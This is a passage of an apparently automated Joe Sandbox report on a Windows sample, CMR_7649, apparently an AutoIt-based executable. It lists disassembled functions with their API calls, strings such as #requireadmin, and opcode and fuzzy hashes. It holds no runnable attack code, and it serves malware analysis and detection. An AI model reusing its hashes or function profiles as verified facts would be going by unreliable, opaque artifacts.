                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                • String ID: \*.*
                                                • API String ID: 2326526234-1173974218
                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                • _wcslen.LIBCMT ref: 004335F2
                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                • GetLastError.KERNEL32 ref: 0043362B
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                • _wcsrchr.LIBCMT ref: 00433666
                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                • String ID: \
                                                • API String ID: 321622961-2967466578
                                                • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                • _wprintf.LIBCMT ref: 004340A1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                • __lock.LIBCMT ref: 00417981
                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                • __lock.LIBCMT ref: 004179A2
                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                • String ID: KERNEL32.DLL$pI
                                                • API String ID: 637971194-197072765
                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$_malloc
                                                • String ID:
                                                • API String ID: 1938898002-0
                                                • Opcode ID: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                • Opcode Fuzzy Hash: 1f9281079767c86d8b96628a3580c8a8d8da7ec8fe09033d6c47d2aab1b684b9
                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                Function 00448D38 Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                • String ID:
                                                • API String ID: 3771399671-0
                                                • Opcode ID: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                • Instruction ID: 7a731ed810a83f1ebb4df5e1cc4d29f9b75a103154dfe2ed632c3d1cef216bf4
                                                • Opcode Fuzzy Hash: 66a9d50f8c9d6af755a83d84fc10a8c9f79f913464eba51571b63e3dd0d935a7
                                                • Instruction Fuzzy Hash: 72513970204244AFF720DF24CC85FAE7BB9AF15314F10495EFA999B292CB79E549CB18
                                                Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                • _memmove.LIBCMT ref: 0044B555
                                                • _memmove.LIBCMT ref: 0044B578
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                • String ID:
                                                • API String ID: 2737351978-0
                                                • Opcode ID: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                • Opcode Fuzzy Hash: 7e8c1d8edbf82e8c7821aeb5991414bf18d3cd2399c52039398c0efb06360fcc
                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                • __calloc_crt.LIBCMT ref: 00415246
                                                • __getptd.LIBCMT ref: 00415253
                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                • _free.LIBCMT ref: 0041529E
                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 3638380555-0
                                                • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorInitLast
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 3207048006-625585964
                                                • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                • gethostbyname.WSOCK32(?), ref: 004655A6
                                                • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                • _memmove.LIBCMT ref: 004656CA
                                                • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                • WSACleanup.WSOCK32 ref: 00465762
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                • String ID:
                                                • API String ID: 2945290962-0
                                                • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                • String ID:
                                                • API String ID: 1457242333-0
                                                • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ConnectRegistry_memmove_wcslen
                                                • String ID:
                                                • API String ID: 15295421-0
                                                • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcstok.LIBCMT ref: 004675B2
                                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                • _wcscpy.LIBCMT ref: 00467641
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                • _wcslen.LIBCMT ref: 00467793
                                                • _wcslen.LIBCMT ref: 004677BD
                                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                • String ID: X
                                                • API String ID: 780548581-3081909835
                                                • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
